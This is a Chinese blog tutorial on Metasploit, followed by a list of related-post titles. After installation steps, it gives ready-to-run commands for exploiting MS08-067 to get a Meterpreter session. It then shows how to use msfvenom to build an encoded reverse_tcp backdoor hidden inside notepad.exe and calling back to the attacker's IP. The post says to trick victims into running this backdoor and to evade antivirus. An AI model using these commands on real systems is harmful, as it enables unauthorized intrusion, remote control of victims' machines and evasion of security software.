Metasploit 原理 使用
来源:互联网 发布:杭州网站建设优化 编辑:程序博客网 时间:2024/05/28 23:23
About Metasploit
____________________________________________________________________________________________________________________________________________-
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。
功能包括:智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
简史:2004年8月,在拉斯维加斯如开了一次世界黑客交流会—黑帽简报(Black Hat Briefings). 在这个会议上,一款叫Metasploit 的攻击和渗透工具备受众黑客关注,出尽了风头。
Ps(说人话)metasploit渗透测试框架,是安全研究人员手上必不可少的工具之一
Operation mode
____________________________________________________________________________________________________________________________________________-
Metasploit框架使Metasploit具有良好的可扩展性,它的控制接口负责发现漏洞、攻击漏洞,提交漏洞,然后通过一些接口加入攻击后处理工具和报表工具。Metasploit框架可以从一个漏洞扫描程序导入数据,使用关于有漏洞主机的详细信息来发现可攻击漏洞,然后使用有效载荷对系统发起攻击。所有这些操作都可以通过Metasploit的Web界面进行管理,而它只是其中一种种管理接口,另外还有命令行工具和一些商业工具等等。
攻击者可以将来漏洞扫描程序的结果导入到Metasploit框架的开源安全工具Armitage中,然后通过Metasploit的模块来确定漏洞。一旦发现了漏洞,攻击者就可以采取一种可行方法攻击系统,通过Shell或启动Metasploit的meterpreter来控制这个系统。
prospective
Metasploit的目标是,永远支持开源软件,促进社区参与,并提供最具创新性的渗透测试人员在世界各地的资源和工具。除了探索商业解决方案,致力于保持免费和开源的Metasploit框架.
Install
Linux operating system
____________________________________________________________________________________________________________________________________________-
(kali linux本身有自带,如果已经装有kali linux的小伙伴可以忽略)
1 打开linux控制台,切换到root权限。
2 安装curl
apt-get install -y curl
3 下载metasploit安装文件
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
- 4 赋予安装文件执行权限
chmod 755 msfinstall
- 5 执行安装文件
./msfinstall
- 6 完整完成后,启动metasploit 在控制台输入msfconsole即可进入metasploit~
启动命令:
msfconsole
[windows operating system]
使用比较麻烦,建议还是装个虚拟机用Linux吧
Use
____________________________________________________________________________________________________________________________________________-
Conventional attack process (常规攻击流程)
- 1 启动msfconsole:
# msfconsole
- 2 选择一个漏洞:
msf > search platform: windows xp sp3
- 3 查看某个漏洞的详细信息;包含使用方法、支持的平台等等,非常有帮助:
msf > info exploit/windows/smb/ms08_067_netapi
- 4 依次执行如下命令:
msf > use exploit/windows/smb/ms08_067_netapi> set payload windows/meterpreter/bind_tcp> set RHOST 192.168.0.108 (设置目标主机IP地址)> exploit
- 5 如果目标主机有这个漏洞的话,你就可以控制它了;如果没有,尝试使用其他漏洞。
[*] Started bind handler[*] Automatically detecting the target...[*] Fingerprint: Windows XP SP3 - Service Pack 3 - lang:Chinese[*] Selected Target: Windows XP SP3 Chinese (AlwaysOn NK)[*] Attempting to trigger the vulnerability...[*] Sending stage (751104 bytes) to 192.168.0.108[*] Meterpreter session 1 opened (192.168.0.1:41614 -> 192.168.0.108:4444) at 2016-04-15 17:29:32meterpreter >现在你就可以控制目标主机了,可以截屏、录音、视频、下载文件、杀进程等等;使用help查看可以执行的命令。
Intrusion into Windows using Backdoors
利用后门程序侵入Windows
____________________________________________________________________________________________________________________________________________-
原理:在Kali Linux上生成后门程序,然后把它发送给受害者,欺骗受害者运行(使用邮件、图片等等)
难点是需要过杀毒软件和防火墙。
1 生成后门程序并隐藏;
2 我们把后门程序隐藏到记事本程序中:notepad.exe
3 查看Kali Linux的IP:
ifconfig(192.146.0.112)
4 创建后门程序,my_backdoor.exe:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.146.0.112 LPORT=4445 -x NOTEPAD.EXE -e x86/jmp_call_additive -i 4 -k -f exe > my_backdoor.exe
5 把它发送到Windows系统,并运行;如果不能运行换用其他加密方式。
6 启动msfconsole:
# msfconsoleuse exploit/multi/handlerset LHOST 192.146.0.112set LPORT 4445set payload windows/meterpreter/reverse_tcpshow optionsexploit
7 等待受害者启动后门程序。
- 8 入侵成功
- Metasploit 原理 使用
- metasploit使用
- Metasploit Framework使用图
- Metasploit的使用测试
- Metasploit使用技巧
- Metasploit使用教程
- Metasploit使用简介(1)
- Metasploit 使用简介2
- Metasploit使用简介3
- Metasploit 使用简介
- metasploit使用msf编码器
- metasploit使用辅助模块
- Metasploit 结合 proxychains 使用
- metasploit 使用教程
- metasploit基础使用
- Metasploit
- Metasploit
- Metasploit
- HDU1114 Piggy-Bank 完全背包
- Java连接Redis
- Java注释学习
- qt开发环境
- react native识别设备,获取设备屏幕尺寸
- Metasploit 原理 使用
- SQL Sercver的基本操作
- 排序
- Chess(百度之星初赛B)
- 函数指针
- 《剑指offer》牛客网java题解-跳台阶
- 使用JDK自带的工具来检测是否有死锁的现象
- 《机器学习》阅读心得——七、贝叶斯分类器
- RocketMQ web界面监控rocketmq-console部署问题